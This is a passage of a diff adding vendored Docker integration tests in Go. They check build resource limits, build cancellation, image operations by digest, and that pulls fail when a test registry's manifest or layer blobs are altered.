dockerCmdInDir(c, ctx.Dir, "build", "--no-cache", "--rm=false", "--memory=64m", "--memory-swap=-1", "--cpuset-cpus=0", "--cpuset-mems=0", "--cpu-shares=100", "--cpu-quota=8000", "--ulimit", "nofile=42", "-t", name, ".") + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "ps", "-lq") + cID := strings.TrimSpace(out) + + type hostConfig struct { + Memory int64 + MemorySwap int64 + CpusetCpus string + CpusetMems string + CPUShares int64 + CPUQuota int64 + Ulimits []*units.Ulimit + } + + cfg := inspectFieldJSON(c, cID, "HostConfig") + + var c1 hostConfig + err = json.Unmarshal([]byte(cfg), &c1) + c.Assert(err, checker.IsNil, check.Commentf(cfg)) + + c.Assert(c1.Memory, checker.Equals, int64(64*1024*1024), check.Commentf("resource constraints not set properly for Memory")) + c.Assert(c1.MemorySwap, checker.Equals, int64(-1), check.Commentf("resource 
constraints not set properly for MemorySwap")) + c.Assert(c1.CpusetCpus, checker.Equals, "0", check.Commentf("resource constraints not set properly for CpusetCpus")) + c.Assert(c1.CpusetMems, checker.Equals, "0", check.Commentf("resource constraints not set properly for CpusetMems")) + c.Assert(c1.CPUShares, checker.Equals, int64(100), check.Commentf("resource constraints not set properly for CPUShares")) + c.Assert(c1.CPUQuota, checker.Equals, int64(8000), check.Commentf("resource constraints not set properly for CPUQuota")) + c.Assert(c1.Ulimits[0].Name, checker.Equals, "nofile", check.Commentf("resource constraints not set properly for Ulimits")) + c.Assert(c1.Ulimits[0].Hard, checker.Equals, int64(42), check.Commentf("resource constraints not set properly for Ulimits")) + + // Make sure constraints aren't saved to image + dockerCmd(c, "run", "--name=test", name) + + cfg = inspectFieldJSON(c, "test", "HostConfig") + + var c2 hostConfig + err = json.Unmarshal([]byte(cfg), &c2) + c.Assert(err, checker.IsNil, check.Commentf(cfg)) + + c.Assert(c2.Memory, check.Not(checker.Equals), int64(64*1024*1024), check.Commentf("resource leaked from build for Memory")) + c.Assert(c2.MemorySwap, check.Not(checker.Equals), int64(-1), check.Commentf("resource leaked from build for MemorySwap")) + c.Assert(c2.CpusetCpus, check.Not(checker.Equals), "0", check.Commentf("resource leaked from build for CpusetCpus")) + c.Assert(c2.CpusetMems, check.Not(checker.Equals), "0", check.Commentf("resource leaked from build for CpusetMems")) + c.Assert(c2.CPUShares, check.Not(checker.Equals), int64(100), check.Commentf("resource leaked from build for CPUShares")) + c.Assert(c2.CPUQuota, check.Not(checker.Equals), int64(8000), check.Commentf("resource leaked from build for CPUQuota")) + c.Assert(c2.Ulimits, checker.IsNil, check.Commentf("resource leaked from build for Ulimits")) +} + +func (s *DockerSuite) TestBuildAddChangeOwnership(c *check.C) { + testRequires(c, DaemonIsLinux) + name := 
"testbuildaddown" + + ctx := func() *FakeContext { + dockerfile := ` + FROM busybox + ADD foo /bar/ + RUN [ $(stat -c %U:%G "/bar") = 'root:root' ] + RUN [ $(stat -c %U:%G "/bar/foo") = 'root:root' ] + ` + tmpDir, err := ioutil.TempDir("", "fake-context") + c.Assert(err, check.IsNil) + testFile, err := os.Create(filepath.Join(tmpDir, "foo")) + if err != nil { + c.Fatalf("failed to create foo file: %v", err) + } + defer testFile.Close() + + chownCmd := exec.Command("chown", "daemon:daemon", "foo") + chownCmd.Dir = tmpDir + out, _, err := runCommandWithOutput(chownCmd) + if err != nil { + c.Fatal(err, out) + } + + if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil { + c.Fatalf("failed to open destination dockerfile: %v", err) + } + return fakeContextFromDir(tmpDir) + }() + + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("build failed to complete for TestBuildAddChangeOwnership: %v", err) + } +} + +// Test that an infinite sleep during a build is killed if the client disconnects. +// This test is fairly hairy because there are lots of ways to race. +// Strategy: +// * Monitor the output of docker events starting from before +// * Run a 1-year-long sleep from a docker build. +// * When docker events sees container start, close the "docker build" command +// * Wait for docker events to emit a dying event. 
+func (s *DockerSuite) TestBuildCancellationKillsSleep(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuildcancellation" + + observer, err := newEventObserver(c) + c.Assert(err, checker.IsNil) + err = observer.Start() + c.Assert(err, checker.IsNil) + defer observer.Stop() + + // (Note: one year, will never finish) + ctx, err := fakeContext("FROM busybox\nRUN sleep 31536000", nil) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + buildCmd := exec.Command(dockerBinary, "build", "-t", name, ".") + buildCmd.Dir = ctx.Dir + + stdoutBuild, err := buildCmd.StdoutPipe() + if err := buildCmd.Start(); err != nil { + c.Fatalf("failed to run build: %s", err) + } + + matchCID := regexp.MustCompile("Running in (.+)") + scanner := bufio.NewScanner(stdoutBuild) + + outputBuffer := new(bytes.Buffer) + var buildID string + for scanner.Scan() { + line := scanner.Text() + outputBuffer.WriteString(line) + outputBuffer.WriteString("\n") + if matches := matchCID.FindStringSubmatch(line); len(matches) > 0 { + buildID = matches[1] + break + } + } + + if buildID == "" { + c.Fatalf("Unable to find build container id in build output:\n%s", outputBuffer.String()) + } + + testActions := map[string]chan bool{ + "start": make(chan bool, 1), + "die": make(chan bool, 1), + } + + matcher := matchEventLine(buildID, "container", testActions) + processor := processEventMatch(testActions) + go observer.Match(matcher, processor) + + select { + case <-time.After(10 * time.Second): + observer.CheckEventError(c, buildID, "start", matcher) + case <-testActions["start"]: + // ignore, done + } + + // Send a kill to the `docker build` command. + // Causes the underlying build to be cancelled due to socket close. + if err := buildCmd.Process.Kill(); err != nil { + c.Fatalf("error killing build command: %s", err) + } + + // Get the exit status of `docker build`, check it exited because killed. 
+ if err := buildCmd.Wait(); err != nil && !integration.IsKilled(err) { + c.Fatalf("wait failed during build run: %T %s", err, err) + } + + select { + case <-time.After(10 * time.Second): + observer.CheckEventError(c, buildID, "die", matcher) + case <-testActions["die"]: + // ignore, done + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go new file mode 100644 index 0000000000..c2d85461a8 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go @@ -0,0 +1,693 @@ +package main + +import ( + "encoding/json" + "fmt" + "os" + "path/filepath" + "regexp" + "strings" + + "github.com/docker/distribution/digest" + "github.com/docker/distribution/manifest/schema1" + "github.com/docker/distribution/manifest/schema2" + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/stringutils" + "github.com/go-check/check" +) + +var ( + remoteRepoName = "dockercli/busybox-by-dgst" + repoName = fmt.Sprintf("%s/%s", privateRegistryURL, remoteRepoName) + pushDigestRegex = regexp.MustCompile("[\\S]+: digest: ([\\S]+) size: [0-9]+") + digestRegex = regexp.MustCompile("Digest: ([\\S]+)") +) + +func setupImage(c *check.C) (digest.Digest, error) { + return setupImageWithTag(c, "latest") +} + +func setupImageWithTag(c *check.C, tag string) (digest.Digest, error) { + containerName := "busyboxbydigest" + + dockerCmd(c, "run", "-e", "digest=1", "--name", containerName, "busybox") + + // tag the image to upload it to the private registry + repoAndTag := repoName + ":" + tag + out, _, err := dockerCmdWithError("commit", containerName, repoAndTag) + c.Assert(err, checker.IsNil, check.Commentf("image tagging failed: %s", out)) + + // delete the container as we don't need it any more + err = deleteContainer(containerName) + c.Assert(err, checker.IsNil) + + // push the image 
+ out, _, err = dockerCmdWithError("push", repoAndTag) + c.Assert(err, checker.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out)) + + // delete our local repo that we previously tagged + rmiout, _, err := dockerCmdWithError("rmi", repoAndTag) + c.Assert(err, checker.IsNil, check.Commentf("error deleting images prior to real test: %s", rmiout)) + + matches := pushDigestRegex.FindStringSubmatch(out) + c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from push output: %s", out)) + pushDigest := matches[1] + + return digest.Digest(pushDigest), nil +} + +func testPullByTagDisplaysDigest(c *check.C) { + testRequires(c, DaemonIsLinux) + pushDigest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + // pull from the registry using the tag + out, _ := dockerCmd(c, "pull", repoName) + + // the pull output includes "Digest: ", so find that + matches := digestRegex.FindStringSubmatch(out) + c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from pull output: %s", out)) + pullDigest := matches[1] + + // make sure the pushed and pull digests match + c.Assert(pushDigest.String(), checker.Equals, pullDigest) +} + +func (s *DockerRegistrySuite) TestPullByTagDisplaysDigest(c *check.C) { + testPullByTagDisplaysDigest(c) +} + +func (s *DockerSchema1RegistrySuite) TestPullByTagDisplaysDigest(c *check.C) { + testPullByTagDisplaysDigest(c) +} + +func testPullByDigest(c *check.C) { + testRequires(c, DaemonIsLinux) + pushDigest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + // pull from the registry using the @ reference + imageReference := fmt.Sprintf("%s@%s", repoName, pushDigest) + out, _ := dockerCmd(c, "pull", imageReference) + + // the pull output includes "Digest: ", so find that + matches := digestRegex.FindStringSubmatch(out) + c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse 
digest from pull output: %s", out)) + pullDigest := matches[1] + + // make sure the pushed and pull digests match + c.Assert(pushDigest.String(), checker.Equals, pullDigest) +} + +func (s *DockerRegistrySuite) TestPullByDigest(c *check.C) { + testPullByDigest(c) +} + +func (s *DockerSchema1RegistrySuite) TestPullByDigest(c *check.C) { + testPullByDigest(c) +} + +func testPullByDigestNoFallback(c *check.C) { + testRequires(c, DaemonIsLinux) + // pull from the registry using the @ reference + imageReference := fmt.Sprintf("%s@sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff", repoName) + out, _, err := dockerCmdWithError("pull", imageReference) + c.Assert(err, checker.NotNil, check.Commentf("expected non-zero exit status and correct error message when pulling non-existing image")) + c.Assert(out, checker.Contains, fmt.Sprintf("manifest for %s not found", imageReference), check.Commentf("expected non-zero exit status and correct error message when pulling non-existing image")) +} + +func (s *DockerRegistrySuite) TestPullByDigestNoFallback(c *check.C) { + testPullByDigestNoFallback(c) +} + +func (s *DockerSchema1RegistrySuite) TestPullByDigestNoFallback(c *check.C) { + testPullByDigestNoFallback(c) +} + +func (s *DockerRegistrySuite) TestCreateByDigest(c *check.C) { + pushDigest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + imageReference := fmt.Sprintf("%s@%s", repoName, pushDigest) + + containerName := "createByDigest" + dockerCmd(c, "create", "--name", containerName, imageReference) + + res := inspectField(c, containerName, "Config.Image") + c.Assert(res, checker.Equals, imageReference) +} + +func (s *DockerRegistrySuite) TestRunByDigest(c *check.C) { + pushDigest, err := setupImage(c) + c.Assert(err, checker.IsNil) + + imageReference := fmt.Sprintf("%s@%s", repoName, pushDigest) + + containerName := "runByDigest" + out, _ := dockerCmd(c, "run", "--name", containerName, imageReference, "sh", 
"-c", "echo found=$digest") + + foundRegex := regexp.MustCompile("found=([^\n]+)") + matches := foundRegex.FindStringSubmatch(out) + c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from pull output: %s", out)) + c.Assert(matches[1], checker.Equals, "1", check.Commentf("Expected %q, got %q", "1", matches[1])) + + res := inspectField(c, containerName, "Config.Image") + c.Assert(res, checker.Equals, imageReference) +} + +func (s *DockerRegistrySuite) TestRemoveImageByDigest(c *check.C) { + digest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + imageReference := fmt.Sprintf("%s@%s", repoName, digest) + + // pull from the registry using the @ reference + dockerCmd(c, "pull", imageReference) + + // make sure inspect runs ok + inspectField(c, imageReference, "Id") + + // do the delete + err = deleteImages(imageReference) + c.Assert(err, checker.IsNil, check.Commentf("unexpected error deleting image")) + + // try to inspect again - it should error this time + _, err = inspectFieldWithError(imageReference, "Id") + //unexpected nil err trying to inspect what should be a non-existent image + c.Assert(err, checker.NotNil) + c.Assert(err.Error(), checker.Contains, "No such object") +} + +func (s *DockerRegistrySuite) TestBuildByDigest(c *check.C) { + digest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + imageReference := fmt.Sprintf("%s@%s", repoName, digest) + + // pull from the registry using the @ reference + dockerCmd(c, "pull", imageReference) + + // get the image id + imageID := inspectField(c, imageReference, "Id") + + // do the build + name := "buildbydigest" + _, err = buildImage(name, fmt.Sprintf( + `FROM %s + CMD ["/bin/echo", "Hello World"]`, imageReference), + true) + c.Assert(err, checker.IsNil) + + // get the build's image id + res := inspectField(c, name, "Config.Image") + // make sure they match + c.Assert(res, checker.Equals, 
imageID) +} + +func (s *DockerRegistrySuite) TestTagByDigest(c *check.C) { + digest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + imageReference := fmt.Sprintf("%s@%s", repoName, digest) + + // pull from the registry using the @ reference + dockerCmd(c, "pull", imageReference) + + // tag it + tag := "tagbydigest" + dockerCmd(c, "tag", imageReference, tag) + + expectedID := inspectField(c, imageReference, "Id") + + tagID := inspectField(c, tag, "Id") + c.Assert(tagID, checker.Equals, expectedID) +} + +func (s *DockerRegistrySuite) TestListImagesWithoutDigests(c *check.C) { + digest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + imageReference := fmt.Sprintf("%s@%s", repoName, digest) + + // pull from the registry using the @ reference + dockerCmd(c, "pull", imageReference) + + out, _ := dockerCmd(c, "images") + c.Assert(out, checker.Not(checker.Contains), "DIGEST", check.Commentf("list output should not have contained DIGEST header")) +} + +func (s *DockerRegistrySuite) TestListImagesWithDigests(c *check.C) { + + // setup image1 + digest1, err := setupImageWithTag(c, "tag1") + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + imageReference1 := fmt.Sprintf("%s@%s", repoName, digest1) + c.Logf("imageReference1 = %s", imageReference1) + + // pull image1 by digest + dockerCmd(c, "pull", imageReference1) + + // list images + out, _ := dockerCmd(c, "images", "--digests") + + // make sure repo shown, tag=, digest = $digest1 + re1 := regexp.MustCompile(`\s*` + repoName + `\s*\s*` + digest1.String() + `\s`) + c.Assert(re1.MatchString(out), checker.True, check.Commentf("expected %q: %s", re1.String(), out)) + // setup image2 + digest2, err := setupImageWithTag(c, "tag2") + //error setting up image + c.Assert(err, checker.IsNil) + imageReference2 := fmt.Sprintf("%s@%s", repoName, digest2) + c.Logf("imageReference2 = %s", imageReference2) + + // pull 
image1 by digest + dockerCmd(c, "pull", imageReference1) + + // pull image2 by digest + dockerCmd(c, "pull", imageReference2) + + // list images + out, _ = dockerCmd(c, "images", "--digests") + + // make sure repo shown, tag=, digest = $digest1 + c.Assert(re1.MatchString(out), checker.True, check.Commentf("expected %q: %s", re1.String(), out)) + + // make sure repo shown, tag=, digest = $digest2 + re2 := regexp.MustCompile(`\s*` + repoName + `\s*\s*` + digest2.String() + `\s`) + c.Assert(re2.MatchString(out), checker.True, check.Commentf("expected %q: %s", re2.String(), out)) + + // pull tag1 + dockerCmd(c, "pull", repoName+":tag1") + + // list images + out, _ = dockerCmd(c, "images", "--digests") + + // make sure image 1 has repo, tag, AND repo, , digest + reWithDigest1 := regexp.MustCompile(`\s*` + repoName + `\s*tag1\s*` + digest1.String() + `\s`) + c.Assert(reWithDigest1.MatchString(out), checker.True, check.Commentf("expected %q: %s", reWithDigest1.String(), out)) + // make sure image 2 has repo, , digest + c.Assert(re2.MatchString(out), checker.True, check.Commentf("expected %q: %s", re2.String(), out)) + + // pull tag 2 + dockerCmd(c, "pull", repoName+":tag2") + + // list images + out, _ = dockerCmd(c, "images", "--digests") + + // make sure image 1 has repo, tag, digest + c.Assert(reWithDigest1.MatchString(out), checker.True, check.Commentf("expected %q: %s", reWithDigest1.String(), out)) + + // make sure image 2 has repo, tag, digest + reWithDigest2 := regexp.MustCompile(`\s*` + repoName + `\s*tag2\s*` + digest2.String() + `\s`) + c.Assert(reWithDigest2.MatchString(out), checker.True, check.Commentf("expected %q: %s", reWithDigest2.String(), out)) + + // list images + out, _ = dockerCmd(c, "images", "--digests") + + // make sure image 1 has repo, tag, digest + c.Assert(reWithDigest1.MatchString(out), checker.True, check.Commentf("expected %q: %s", reWithDigest1.String(), out)) + // make sure image 2 has repo, tag, digest + 
c.Assert(reWithDigest2.MatchString(out), checker.True, check.Commentf("expected %q: %s", reWithDigest2.String(), out)) + // make sure busybox has tag, but not digest + busyboxRe := regexp.MustCompile(`\s*busybox\s*latest\s*\s`) + c.Assert(busyboxRe.MatchString(out), checker.True, check.Commentf("expected %q: %s", busyboxRe.String(), out)) +} + +func (s *DockerRegistrySuite) TestListDanglingImagesWithDigests(c *check.C) { + // setup image1 + digest1, err := setupImageWithTag(c, "dangle1") + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + imageReference1 := fmt.Sprintf("%s@%s", repoName, digest1) + c.Logf("imageReference1 = %s", imageReference1) + + // pull image1 by digest + dockerCmd(c, "pull", imageReference1) + + // list images + out, _ := dockerCmd(c, "images", "--digests") + + // make sure repo shown, tag=, digest = $digest1 + re1 := regexp.MustCompile(`\s*` + repoName + `\s*\s*` + digest1.String() + `\s`) + c.Assert(re1.MatchString(out), checker.True, check.Commentf("expected %q: %s", re1.String(), out)) + // setup image2 + digest2, err := setupImageWithTag(c, "dangle2") + //error setting up image + c.Assert(err, checker.IsNil) + imageReference2 := fmt.Sprintf("%s@%s", repoName, digest2) + c.Logf("imageReference2 = %s", imageReference2) + + // pull image1 by digest + dockerCmd(c, "pull", imageReference1) + + // pull image2 by digest + dockerCmd(c, "pull", imageReference2) + + // list images + out, _ = dockerCmd(c, "images", "--digests", "--filter=dangling=true") + + // make sure repo shown, tag=, digest = $digest1 + c.Assert(re1.MatchString(out), checker.True, check.Commentf("expected %q: %s", re1.String(), out)) + + // make sure repo shown, tag=, digest = $digest2 + re2 := regexp.MustCompile(`\s*` + repoName + `\s*\s*` + digest2.String() + `\s`) + c.Assert(re2.MatchString(out), checker.True, check.Commentf("expected %q: %s", re2.String(), out)) + + // pull dangle1 tag + dockerCmd(c, "pull", repoName+":dangle1") + + // list images + 
out, _ = dockerCmd(c, "images", "--digests", "--filter=dangling=true") + + // make sure image 1 has repo, tag, AND repo, , digest + reWithDigest1 := regexp.MustCompile(`\s*` + repoName + `\s*dangle1\s*` + digest1.String() + `\s`) + c.Assert(reWithDigest1.MatchString(out), checker.False, check.Commentf("unexpected %q: %s", reWithDigest1.String(), out)) + // make sure image 2 has repo, , digest + c.Assert(re2.MatchString(out), checker.True, check.Commentf("expected %q: %s", re2.String(), out)) + + // pull dangle2 tag + dockerCmd(c, "pull", repoName+":dangle2") + + // list images, show tagged images + out, _ = dockerCmd(c, "images", "--digests") + + // make sure image 1 has repo, tag, digest + c.Assert(reWithDigest1.MatchString(out), checker.True, check.Commentf("expected %q: %s", reWithDigest1.String(), out)) + + // make sure image 2 has repo, tag, digest + reWithDigest2 := regexp.MustCompile(`\s*` + repoName + `\s*dangle2\s*` + digest2.String() + `\s`) + c.Assert(reWithDigest2.MatchString(out), checker.True, check.Commentf("expected %q: %s", reWithDigest2.String(), out)) + + // list images, no longer dangling, should not match + out, _ = dockerCmd(c, "images", "--digests", "--filter=dangling=true") + + // make sure image 1 has repo, tag, digest + c.Assert(reWithDigest1.MatchString(out), checker.False, check.Commentf("unexpected %q: %s", reWithDigest1.String(), out)) + // make sure image 2 has repo, tag, digest + c.Assert(reWithDigest2.MatchString(out), checker.False, check.Commentf("unexpected %q: %s", reWithDigest2.String(), out)) +} + +func (s *DockerRegistrySuite) TestInspectImageWithDigests(c *check.C) { + digest, err := setupImage(c) + c.Assert(err, check.IsNil, check.Commentf("error setting up image")) + + imageReference := fmt.Sprintf("%s@%s", repoName, digest) + + // pull from the registry using the @ reference + dockerCmd(c, "pull", imageReference) + + out, _ := dockerCmd(c, "inspect", imageReference) + + var imageJSON []types.ImageInspect + err = 
json.Unmarshal([]byte(out), &imageJSON) + c.Assert(err, checker.IsNil) + c.Assert(imageJSON, checker.HasLen, 1) + c.Assert(imageJSON[0].RepoDigests, checker.HasLen, 1) + c.Assert(stringutils.InSlice(imageJSON[0].RepoDigests, imageReference), checker.Equals, true) +} + +func (s *DockerRegistrySuite) TestPsListContainersFilterAncestorImageByDigest(c *check.C) { + digest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + imageReference := fmt.Sprintf("%s@%s", repoName, digest) + + // pull from the registry using the @ reference + dockerCmd(c, "pull", imageReference) + + // build an image from it + imageName1 := "images_ps_filter_test" + _, err = buildImage(imageName1, fmt.Sprintf( + `FROM %s + LABEL match me 1`, imageReference), true) + c.Assert(err, checker.IsNil) + + // run a container based on that + dockerCmd(c, "run", "--name=test1", imageReference, "echo", "hello") + expectedID, err := getIDByName("test1") + c.Assert(err, check.IsNil) + + // run a container based on the a descendant of that too + dockerCmd(c, "run", "--name=test2", imageName1, "echo", "hello") + expectedID1, err := getIDByName("test2") + c.Assert(err, check.IsNil) + + expectedIDs := []string{expectedID, expectedID1} + + // Invalid imageReference + out, _ := dockerCmd(c, "ps", "-a", "-q", "--no-trunc", fmt.Sprintf("--filter=ancestor=busybox@%s", digest)) + // Filter container for ancestor filter should be empty + c.Assert(strings.TrimSpace(out), checker.Equals, "") + + // Valid imageReference + out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=ancestor="+imageReference) + checkPsAncestorFilterOutput(c, out, imageReference, expectedIDs) +} + +func (s *DockerRegistrySuite) TestDeleteImageByIDOnlyPulledByDigest(c *check.C) { + pushDigest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + // pull from the registry using the @ reference + imageReference := fmt.Sprintf("%s@%s", repoName, 
pushDigest) + dockerCmd(c, "pull", imageReference) + // just in case... + + dockerCmd(c, "tag", imageReference, repoName+":sometag") + + imageID := inspectField(c, imageReference, "Id") + + dockerCmd(c, "rmi", imageID) + + _, err = inspectFieldWithError(imageID, "Id") + c.Assert(err, checker.NotNil, check.Commentf("image should have been deleted")) +} + +func (s *DockerRegistrySuite) TestDeleteImageWithDigestAndTag(c *check.C) { + pushDigest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + // pull from the registry using the @ reference + imageReference := fmt.Sprintf("%s@%s", repoName, pushDigest) + dockerCmd(c, "pull", imageReference) + + imageID := inspectField(c, imageReference, "Id") + + repoTag := repoName + ":sometag" + repoTag2 := repoName + ":othertag" + dockerCmd(c, "tag", imageReference, repoTag) + dockerCmd(c, "tag", imageReference, repoTag2) + + dockerCmd(c, "rmi", repoTag2) + + // rmi should have deleted only repoTag2, because there's another tag + inspectField(c, repoTag, "Id") + + dockerCmd(c, "rmi", repoTag) + + // rmi should have deleted the tag, the digest reference, and the image itself + _, err = inspectFieldWithError(imageID, "Id") + c.Assert(err, checker.NotNil, check.Commentf("image should have been deleted")) +} + +func (s *DockerRegistrySuite) TestDeleteImageWithDigestAndMultiRepoTag(c *check.C) { + pushDigest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + repo2 := fmt.Sprintf("%s/%s", repoName, "repo2") + + // pull from the registry using the @ reference + imageReference := fmt.Sprintf("%s@%s", repoName, pushDigest) + dockerCmd(c, "pull", imageReference) + + imageID := inspectField(c, imageReference, "Id") + + repoTag := repoName + ":sometag" + repoTag2 := repo2 + ":othertag" + dockerCmd(c, "tag", imageReference, repoTag) + dockerCmd(c, "tag", imageReference, repoTag2) + + dockerCmd(c, "rmi", repoTag) + + // rmi should have deleted 
repoTag and image reference, but left repoTag2 + inspectField(c, repoTag2, "Id") + _, err = inspectFieldWithError(imageReference, "Id") + c.Assert(err, checker.NotNil, check.Commentf("image digest reference should have been removed")) + + _, err = inspectFieldWithError(repoTag, "Id") + c.Assert(err, checker.NotNil, check.Commentf("image tag reference should have been removed")) + + dockerCmd(c, "rmi", repoTag2) + + // rmi should have deleted the tag, the digest reference, and the image itself + _, err = inspectFieldWithError(imageID, "Id") + c.Assert(err, checker.NotNil, check.Commentf("image should have been deleted")) +} + +// TestPullFailsWithAlteredManifest tests that a `docker pull` fails when +// we have modified a manifest blob and its digest cannot be verified. +// This is the schema2 version of the test. +func (s *DockerRegistrySuite) TestPullFailsWithAlteredManifest(c *check.C) { + testRequires(c, DaemonIsLinux) + manifestDigest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + // Load the target manifest blob. + manifestBlob := s.reg.readBlobContents(c, manifestDigest) + + var imgManifest schema2.Manifest + err = json.Unmarshal(manifestBlob, &imgManifest) + c.Assert(err, checker.IsNil, check.Commentf("unable to decode image manifest from blob")) + + // Change a layer in the manifest. + imgManifest.Layers[0].Digest = digest.Digest("sha256:0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef") + + // Move the existing data file aside, so that we can replace it with a + // malicious blob of data. NOTE: we defer the returned undo func. + undo := s.reg.tempMoveBlobData(c, manifestDigest) + defer undo() + + alteredManifestBlob, err := json.MarshalIndent(imgManifest, "", " ") + c.Assert(err, checker.IsNil, check.Commentf("unable to encode altered image manifest to JSON")) + + s.reg.writeBlobContents(c, manifestDigest, alteredManifestBlob) + + // Now try pulling that image by digest. 
We should get an error about + // digest verification for the manifest digest. + + // Pull from the registry using the @ reference. + imageReference := fmt.Sprintf("%s@%s", repoName, manifestDigest) + out, exitStatus, _ := dockerCmdWithError("pull", imageReference) + c.Assert(exitStatus, checker.Not(check.Equals), 0) + + expectedErrorMsg := fmt.Sprintf("manifest verification failed for digest %s", manifestDigest) + c.Assert(out, checker.Contains, expectedErrorMsg) +} + +// TestPullFailsWithAlteredManifest tests that a `docker pull` fails when +// we have modified a manifest blob and its digest cannot be verified. +// This is the schema1 version of the test. +func (s *DockerSchema1RegistrySuite) TestPullFailsWithAlteredManifest(c *check.C) { + testRequires(c, DaemonIsLinux) + manifestDigest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + // Load the target manifest blob. + manifestBlob := s.reg.readBlobContents(c, manifestDigest) + + var imgManifest schema1.Manifest + err = json.Unmarshal(manifestBlob, &imgManifest) + c.Assert(err, checker.IsNil, check.Commentf("unable to decode image manifest from blob")) + + // Change a layer in the manifest. + imgManifest.FSLayers[0] = schema1.FSLayer{ + BlobSum: digest.Digest("sha256:0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef"), + } + + // Move the existing data file aside, so that we can replace it with a + // malicious blob of data. NOTE: we defer the returned undo func. + undo := s.reg.tempMoveBlobData(c, manifestDigest) + defer undo() + + alteredManifestBlob, err := json.MarshalIndent(imgManifest, "", " ") + c.Assert(err, checker.IsNil, check.Commentf("unable to encode altered image manifest to JSON")) + + s.reg.writeBlobContents(c, manifestDigest, alteredManifestBlob) + + // Now try pulling that image by digest. We should get an error about + // digest verification for the manifest digest. + + // Pull from the registry using the @ reference. 
+ imageReference := fmt.Sprintf("%s@%s", repoName, manifestDigest) + out, exitStatus, _ := dockerCmdWithError("pull", imageReference) + c.Assert(exitStatus, checker.Not(check.Equals), 0) + + expectedErrorMsg := fmt.Sprintf("image verification failed for digest %s", manifestDigest) + c.Assert(out, checker.Contains, expectedErrorMsg) +} + +// TestPullFailsWithAlteredLayer tests that a `docker pull` fails when +// we have modified a layer blob and its digest cannot be verified. +// This is the schema2 version of the test. +func (s *DockerRegistrySuite) TestPullFailsWithAlteredLayer(c *check.C) { + testRequires(c, DaemonIsLinux) + manifestDigest, err := setupImage(c) + c.Assert(err, checker.IsNil) + + // Load the target manifest blob. + manifestBlob := s.reg.readBlobContents(c, manifestDigest) + + var imgManifest schema2.Manifest + err = json.Unmarshal(manifestBlob, &imgManifest) + c.Assert(err, checker.IsNil) + + // Next, get the digest of one of the layers from the manifest. + targetLayerDigest := imgManifest.Layers[0].Digest + + // Move the existing data file aside, so that we can replace it with a + // malicious blob of data. NOTE: we defer the returned undo func. + undo := s.reg.tempMoveBlobData(c, targetLayerDigest) + defer undo() + + // Now make a fake data blob in this directory. + s.reg.writeBlobContents(c, targetLayerDigest, []byte("This is not the data you are looking for.")) + + // Now try pulling that image by digest. We should get an error about + // digest verification for the target layer digest. + + // Remove distribution cache to force a re-pull of the blobs + if err := os.RemoveAll(filepath.Join(dockerBasePath, "image", s.d.storageDriver, "distribution")); err != nil { + c.Fatalf("error clearing distribution cache: %v", err) + } + + // Pull from the registry using the @ reference. 
+ imageReference := fmt.Sprintf("%s@%s", repoName, manifestDigest) + out, exitStatus, _ := dockerCmdWithError("pull", imageReference) + c.Assert(exitStatus, checker.Not(check.Equals), 0, check.Commentf("expected a non-zero exit status")) + + expectedErrorMsg := fmt.Sprintf("filesystem layer verification failed for digest %s", targetLayerDigest) + c.Assert(out, checker.Contains, expectedErrorMsg, check.Commentf("expected error message in output: %s", out)) +} + +// TestPullFailsWithAlteredLayer tests that a `docker pull` fails when +// we have modified a layer blob and its digest cannot be verified. +// This is the schema1 version of the test. +func (s *DockerSchema1RegistrySuite) TestPullFailsWithAlteredLayer(c *check.C) { + testRequires(c, DaemonIsLinux) + manifestDigest, err := setupImage(c) + c.Assert(err, checker.IsNil) + + // Load the target manifest blob. + manifestBlob := s.reg.readBlobContents(c, manifestDigest) + + var imgManifest schema1.Manifest + err = json.Unmarshal(manifestBlob, &imgManifest) + c.Assert(err, checker.IsNil) + + // Next, get the digest of one of the layers from the manifest. + targetLayerDigest := imgManifest.FSLayers[0].BlobSum + + // Move the existing data file aside, so that we can replace it with a + // malicious blob of data. NOTE: we defer the returned undo func. + undo := s.reg.tempMoveBlobData(c, targetLayerDigest) + defer undo() + + // Now make a fake data blob in this directory. + s.reg.writeBlobContents(c, 